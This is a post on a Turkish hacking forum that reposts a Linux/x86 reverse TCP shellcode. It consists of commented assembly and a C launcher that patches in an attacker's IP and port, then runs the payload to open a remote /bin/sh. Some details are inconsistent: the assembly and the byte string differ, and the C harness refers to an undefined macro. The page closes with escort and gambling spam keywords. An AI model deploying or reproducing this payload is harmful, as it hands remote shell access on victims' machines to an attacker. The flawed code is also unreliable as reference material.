[rootturkhacks.com~]
duyuru LiNK KISALTMAK / TEMA VEYA SCRiPT iSTEĞiNDE BULUNMAK YASAKTIR!
duyuru GiZLi iÇERiKLERE "asdafsdfsdf" TARZI YORUM YAPMAK BAN SEBEBIDIR !
hack forum

Linux/x86 reverse TCP Shellcode (84 bytes)

#1
Linux/x86 reverse TCP Shellcode (84 bytes)


Kod:
# Title: Linux/x86 - Reverse TCP Shellcode ( 84 bytes )
# Author: Xenofon Vassilakopoulos
# Tested on: Linux 3.13.0-32-generic #57~precise1-Ubuntu i686 i386 GNU/Linux
# Architecture: i686 GNU/Linux
# Shellcode Length: 84 bytes
# SLAE-ID: SLAE - 1314

--------------------- Reverse Shellcode ---------------------

global _start
section .text

_start:  

xor eax, eax   ;zero out eax register  
mul edx        ;zero out edx register

;;sockfd = socket(AF_INET,SOCK_STREAM,0);
push edx     ; push 0 on the stack which is related with the third argument of the socket system call
mov ebx, edx ; zero out ebx  
inc ebx      ; define the SYS_SOCKET value to be 0x1.  
push ebx     ; SOCK_STREAM constant at type argument  
push 0x2     ; AF_INET constant at domain argument
mov ecx, esp ; ECX will point to args at the top of the stack
mov al, 0x66 ; call SocketCall()
int 0x80     ; call system call interrupt to execute the arguments
mov edi, eax ; EAX will store the return value of the socket descriptor to edi register

;; sa.sin_family = AF_INET;
;; sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR);
;; sa.sin_port = htons(REMOTE_PORT);
;; connect(sockfd, (struct sockaddr *)&sa, sizeof(sa));

pop ebx          ; assign ebx with value (2)
push 0x04c8a8c0  ; push IP 192.168.200.4 on the stack
push word 0xd204 ; push port 1234 on the stack  
push bx          ; push AF_INET constant into the 16 bytes register avoiding nulls
mov ecx, esp     ; perform stack alignment - ecx points to struct
push 0x10        ; the size of the port  
push ecx         ; pointer to host_addr struct
push edi         ; save socket descriptor sockfd to struct
mov ecx, esp     ; perform stack alignment - ecx points at struct
inc ebx          ; use the connect system call (3)
mov al, 0x66     ; call the socketcall system call
int 0x80         ; call interrupt

;;dup2(sockfd, 2);
;;dup2(sockfd, 1);
;;dup2(sockfd, 0);
   
mov ebx, esi  ; move sockfd descriptor to ebx
xor ecx, ecx  ; zero out the ecx register before using it  
lo:
 mov al, 0x3f  ; the functional number that indicates dup2 (63 in dec)
 int 0x80      ; call dup2 syscall
 inc ecx       ; increase the value of ecx by 1 so it will take all values 0(stdin), 1(stdout), 2(stderr)
 cmp cl, 0x2   ; compare ecx with 2 which indicates the stderr descriptor
 jle lo        ; loop until counter is less or equal to 2


;; execve("/bin/sh", 0, 0);
xor eax, eax     ; zero out the eax register
push eax         ; push NULL into the stack  
push 0x68732f2f  ; push "hs//" in reverse order into stack
push 0x6e69622f  ; push "nib/" in reverse order into stack
mov ebx, esp     ; point ebx into stack
push eax         ; push NULL into the stack
mov edx, esp     ; point to edx into stack  
push ebx         ; push ebx into stack
mov ecx, esp     ; point to ecx into stack
mov al, 0xb      ; 0xb indicates the execve syscall
int 0x80         ; execute execve syscall


--------------------- Shellcode ---------------------

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>

#define PORT 27
#define REMOTE_ADDRESS 21

int main(int argc, char *argv[])
{

unsigned char shellcode[] = \
"\x31\xc0\xf7\xe2\x52\x89"
"\xd3\x43\x53\x6a\x02\x89"
"\xe1\xb0\x66\xcd\x80\x89"
"\xc7\x5b\x68"
"\xc0\xa8\xc8\x04"  // IP
"\x66\x68"
"\x04\xd2"   // PORT
"\x66\x53\x89\xe1\x6a\x10"
"\x51\x57\x89\xe1\x43\xb0"
"\x66\xcd\x80\x89\xfb\x31"
"\xc9\xb0\x3f\xcd\x80\x41"
"\x66\x83\xf9\x02\x7e\xf5"
"\x31\xc0\x50\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x89\xe2"
"\x53\x89\xe1\xb0\x0b\xcd"
"\x80";

// provide binary form of the IP into the shellcode in order to be able to connect to that specific IP address
unsigned ipaddress = inet_addr(argv[1]);

// copy the IP in the right shellcode offset 21 bytes from the beginning of the shellcode
memcpy(&shellcode[IP], &ipaddress, 4);

// provide binary form of the port into the shellcode in order to be able to connect to that specific port
unsigned int port = htons(atoi(argv[2]));

// copy the new port in the right shellcode offset 27 bytes from the beginning of the shellcode
memcpy(&shellcode[PORT], &port, 2);

printf("Shellcode Length: %d\n", strlen(shellcode));

int (*ret)() = (int(*)())shellcode;

ret();

}

#  0day.today [2020-10-25]  #
Alıntı
#2
TCP üzerinden Linux a sızma sanırım yanlış da anlamış olabilirim konu güzel ama bilmeyenler için biraz daha aydınlatıcı bilgiler girilebilir
imza
Eşkıyalar bile ağlar ama Tanrı umursuyor mu?
#tupacshakur

Bu Kez Daha Da Sertim Yiyorsa Gelip Kesin Sesimi !!

Öcünü Alana Kadar 

sudo apt-get update   -ls cd/hacking  rm -r hacking 
[Resim: giphy.gif]
THS V6.6.6 Hırs ve Nefretimizle Güçlendirildi
  #Turkhacks #KaranlıkÖzgürlüktür #TurkhacksSokaktır
Alıntı


Benzer Konular...
Konu: Yazar Cevaplar: Gösterim: Son Mesaj
  Linux / Unix su Privilege Escalation Exploit 0bir 0 19 10-23-2020, 10:08 PM
Son Mesaj: 0bir
  Linux expand_downwards() / munmap() Race Condition Exploit 0bir 0 35 09-15-2020, 08:49 PM
Son Mesaj: 0bir
  Linux CoW Incorrect Access Grant Exploit 0bir 0 40 08-31-2020, 12:22 AM
Son Mesaj: 0bir
  Linux/x86 execve /bin/sh Shellcode (10 bytes) 0bir 0 31 08-31-2020, 12:21 AM
Son Mesaj: 0bir
  Linux/x86 reverse TCP Shellcode (84 bytes) 0bir 0 26 08-31-2020, 12:20 AM
Son Mesaj: 0bir



Bu konuyu görüntüleyen kullanıcı(lar): 1 Ziyaretçi
brazzers premium accounts izmit escort porno beylikdüzü escort avcılar escort porno cami halısı cami halısı vdcasino vdcasino giriş ilbet casino siteleri taraftarium24 ilbet giriş mobil ödeme ile bahis izmir escort izmir escort izmir escort izmir escort diyarbakır escort kızılay escort gaziantep escort